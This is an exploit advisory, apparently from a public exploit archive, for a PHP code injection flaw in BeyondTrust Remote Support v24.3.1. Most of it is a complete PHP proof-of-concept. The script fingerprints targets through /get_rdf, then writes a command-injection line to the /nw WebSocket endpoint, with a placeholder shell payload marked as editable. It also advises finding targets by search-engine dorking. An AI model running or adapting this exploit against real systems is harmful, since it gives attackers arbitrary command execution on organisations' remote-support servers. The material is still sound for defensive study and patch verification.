=============================================================================================================================================
| # Title     : BeyondTrust v24.3.1 PHP Code Injection Vulnerability                                                                        |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
| # Vendor    : https://www.beyondtrust.com                                                                                                 |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] The code exploits a vulnerability in BeyondTrust Remote Support via WebSocket to execute arbitrary commands on the target system.
 
[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php <URL>

[+] SeT target  = Line 72

[+] PayLoad :

<?php

class BeyondTrustExploit {
    private $target;
    private $port;
    private $use_ssl;
    private $payload;

    public function __construct($target, $port = 443, $use_ssl = true) {
        $this->target = $target;
        $this->port = $port;
        $this->use_ssl = $use_ssl;
        $this->payload = "echo 'Hacked';"; // تعديل الحمولة حسب الحاجة
    }

    private function send_request($path, $params = []) {
        $protocol = $this->use_ssl ? 'https' : 'http';
        $url = "$protocol://{$this->target}:{$this->port}$path";
        
        $query_string = http_build_query($params);
        $full_url = !empty($query_string) ? "$url?$query_string" : $url;
        
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $full_url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        
        $response = curl_exec($ch);
        curl_close($ch);
        
        return $response;
    }

    public function check_vulnerability() {
        $response = $this->send_request('/get_rdf', ['comp' => 'sdcust', 'locale_code' => 'en-us']);
        
        if (!$response) {
            return "No Target";
        }
        
        if (strpos($response, 'Thank you for using BeyondTrust') !== false) {
            return "OHH OK";
        }
        return "no";
    }

    public function exploit() {
        $ws_url = ($this->use_ssl ? 'wss' : 'ws') . "://{$this->target}:{$this->port}/nw";
        
        $headers = [
            "Sec-WebSocket-Protocol: ingredi support desk customer thin",
            "X-Ns-Company: TargetCompany",
            "Host: {$this->target}"
        ];
        
        $wsock = fsockopen($this->target, $this->port, $errno, $errstr, 10);
        if (!$wsock) {
            return " WebSocket";
        }
        
        fwrite($wsock, "1\n");
        fwrite($wsock, uniqid() . "\n");
        fwrite($wsock, "0\n");
        fwrite($wsock, "\xC0'; \! {$this->payload} #\n");
        
        fclose($wsock);
        return "payload";
    }
}

$exploit = new BeyondTrustExploit('127.0.0.1');
echo $exploit->check_vulnerability();
echo "\n";
echo $exploit->exploit();

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================